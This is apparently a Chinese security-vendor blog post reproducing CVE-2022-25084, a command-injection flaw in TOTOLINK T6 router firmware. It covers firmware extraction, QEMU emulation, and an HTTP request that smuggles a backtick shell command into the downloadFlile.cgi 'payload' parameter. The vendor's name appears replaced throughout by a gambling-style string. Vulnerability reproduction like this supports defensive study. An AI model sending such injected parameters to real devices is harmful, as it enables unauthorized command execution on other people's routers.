提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《威尼斯wns.8885556隐私条款》
免费试用
400-811-3777

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于威尼斯wns.8885556
    申请试用
      热门阅读
      1

      威尼斯wns8885556用户专访 | 精细化管理:医疗行业数据分类分级的策略与实践

      2025-01-10

       2

      容灾演练双月报|威尼斯wns8885556助力某特大型通信基础设施央企顺利完成多个核心系统异地容灾演练

      2025-01-10

       3

      国家级|威尼斯wns8885556、徐医附院共建项目入选工信部《2024年网络安全技术应用典型案例拟支持项目名单》

      2024-12-20

       4

      全球数据跨境流动合作倡议

      2024-11-22

       5

      世界互联网大会|威尼斯wns8885556数据库保险箱(DBSafe)发布!

      2024-11-21
      相关文章

      每周安全速递³²⁵|Cl0p勒索软件团伙即将公开60多名遭受Cleo攻击的受害者名单

      2025-01-03

      每周安全速递³²⁴|Ascension Health遭勒索软件攻击导致560万患者信息泄露

      2024-12-27

      每周安全速递³²³|Cl0p勒索组织利用Cleo漏洞攻击全球企业

      2024-12-20

      每周安全速递³²²|Black Basta勒索软件利用社交工程与多阶段感染流程展开攻击

      2024-12-13

      每周安全速递³²¹|俄罗斯逮捕因涉嫌参与勒索软件团伙活动的网络犯罪分子Wazawaka

      2024-12-06
      CVE-2022-25084 TOTOLINK路由器任意命令执行漏洞复现
      发布时间:2023-06-02 阅读次数: 485 次


      漏洞简介



      TOTOLINK是一款无线路由品牌,TOTOLINK T6_Firmware V5.9c.4085_B20190428存在一个任意命令执行漏洞。


      影响版本



      TOTOLINK T6_Firmware V5.9c.4085_B20190428

      访问


      https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.h

      下载T6_Firmware V5.9c.4085_B20190428固件

      图片

      固件下载成功后,执行

      binwalk -Me TOTOLINK_C818NR_T6_IP04338_8197FN_SPI_16M128M_V5.9c.4085_B20190428_ALL.web --run-as=root

      提取文件系统

      图片

      进入提取的文件系统目录

      执行

      mkdir var/run && touch /var/run/lighttpd.pid

      创建路由器启动环境所需的pid

      图片

      执行

      给路由器web服务创建一个虚拟网络环境

      图片

      执行

      wget https://people.debian.org/\~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2 && wget https://people.debian.org/\~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta

      下载镜像和虚拟磁盘环境,为搭建路由器web作前置准备

      图片

      镜像和虚拟磁盘下载完毕后,执行

      qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic

      启动虚拟环境,虚拟环境启动后账号密码为root/root

      登录虚拟环境后,执行


      ifconfig eth0 192.168.6.10

      配置虚拟环境网络

      图片

      返回原始机器环境,执行


      scp -r squashfs-root/ root@192.168.6.10:/root/

      将文件系统拷贝至虚拟环境中

      在虚拟环境中执行

      启动路由器web服务

      图片

      在原始机器环境中通过浏览器访问

      http://192.168.6.15/login.asp

      出现如图所示页面代表环境搭建成功

      图片


      该漏洞触发点位于

      /cgi-bin/downloadFlile.cgi

      构造如下数据包并请求

      执行pwd命令并将命令结果写入../pwd.txt

      • GET /cgi-bin/downloadFlile.cgi?payload=`pwd>../pwd.txt` HTTP/1.1
        Host: 192.168.6.10
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
      • Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      • Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      • Accept-Encoding: gzip, deflate
      • Connection: close
      • Upgrade-Insecure-Requests: 1

      浏览器访问

      如图所示,页面显示pwd命令结果

      上一条:威尼斯wns.8885556发布《2023年5月勒索病毒威胁报告》
      下一条:每周安全速递²⁶²|微软发现macOS漏洞可让黑客绕过SIP root限制
      返回
      关注或联系威尼斯wns8885556
      官方订阅号 官方订阅号
      官方服务号 官方服务号
      第59号 第59号
      服务热线:400-811-3777
      商务合作:marketing@mchz.com.cn
      友情链接 中央网信办 公安部 工信部 CNCERT 中国信通院 中国软件测评中心 国家工业信息安全发展研究中心 赛迪研究院
      Copyright © 2024 威尼斯wns.8885556 All rights reserved.
      浙公网安备 33010502006954号 浙ICP备12021012号-1 网站地图 网站声明及隐私保护政策
      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部